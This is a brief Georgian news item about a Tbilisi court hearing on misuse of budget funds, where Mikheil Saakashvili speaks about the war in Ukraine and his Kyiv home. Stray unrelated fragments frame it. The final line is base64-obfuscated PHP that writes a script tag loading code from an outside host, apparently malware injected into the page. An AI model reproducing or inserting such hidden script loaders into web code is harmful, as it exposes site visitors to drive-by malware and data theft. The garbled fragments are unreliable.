celsiusi
ავერსი შნაიდერი
საქალაქო სასამართლო საბიუჯეტო სახსრების გაფლანგვის საქმეზე მსჯელობს. პროცესს მესამე პრეზიდენტი მიხეილ სააკაშვილიც ესწრება, მან, განსასჯელის სკამიდან, ტრადიციულად სიტყვის უფლებით ისარგებლა, შემდეგ კი შესვენება მოითხოვა, რადგან თავს შეუძლოდ გრძნობდა.
 
"მე მინდა აუცილებლად პეტიციას მოვაწერო ხელი ევროკავშირში საქართველოს მიღების თაობაზე, მაგრამ ვიღაცები იძახიან, რომ ჩვენ და მე გვიხარია უკრაინაში ომი. მინდა ვუთხრა იმ იდიოტებს, ვინც ამას ლაპარაკობს. მე თქვენგან განსხვავებით საქართველოში არაფერი შემიძენია. პირველად ცხოვრებაში ავიშენე კიევში კარგი სახლი, ჩემი ძალიან ლამაზი გემოვნებით მოწყობილი, ეს არის ჩემი სახლი. რანაირად შეიძლება გიხაროდეს ომი?!
 
როდესაც ღირსებასა ომს შორის ირჩევ უღირსობას, მიიღებ უღირსობასაც და მიიღებ ომს.
 
მე ჩემს უსაფრთხოებაზე არ ვზრუნავ. მოვუწოდებ, ვინც ამას წყვეტს იმ კაცს, გამიშვან ჩემს მეგობართან და ჩემს მთავარსარდალთან ზელენსკისთან ყველაზე სახიფათო ადგილას მსოფლიოში - კიევში," - განაცხადა მიხეილ სააკაშვილმა.
761
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");